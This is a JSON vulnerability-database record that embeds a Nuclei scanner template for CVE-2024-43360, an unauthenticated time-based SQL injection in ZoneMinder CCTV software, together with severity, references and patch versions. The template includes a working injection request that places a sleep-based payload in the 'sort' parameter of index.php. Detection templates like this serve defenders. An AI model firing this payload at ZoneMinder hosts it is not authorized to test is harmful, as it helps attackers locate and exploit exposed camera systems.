{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-43360/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-43360/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-43360/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-43360/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-43360/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-43360"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-43360"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-43360.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2024-43360\n\ninfo:\n  name: ZoneMinder - SQL Injection\n  author: s4e-io\n  severity: critical\n  description: |\n    ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.\n  impact: |\n    Unauthenticated attackers can exploit time-based SQL injection to extract sensitive database information from ZoneMinder.\n  remediation: |\n    Update ZoneMinder to version 1.36.34 or 1.37.61 or later.\n  reference:\n    - https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-9cmr-7437-v9fj\n    - https://medium.com/techpioneers/cve-2024-43360-in-depth-analysis-and-implications-for-security-75ceccc746b4\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-43360\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-43360\n    cwe-id: CWE-89\n    epss-score: 0.06222\n    epss-percentile: 0.93271\n    cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: zoneminder\n    product: zoneminder\n    fofa-query: icon_hash=\"-1218152116\"\n  tags: cve,cve2024,zoneminder,sqli,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout 20s\n        GET /zm/index.php?sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=6'\n          - 'contains_all(body,\"result\\\":\\\"Ok\", \"rows\\\":[\")'\n          - 'contains(content_type,\"application/json\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a0047304502204bf9b861b1a8db04b9c515f6b284631b17112771ff75fcd752549d6d03247f7c022100b07d88596734e65df84b7eabd53fa1e776b582711accc367994ad95e13115e19:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-43360"
}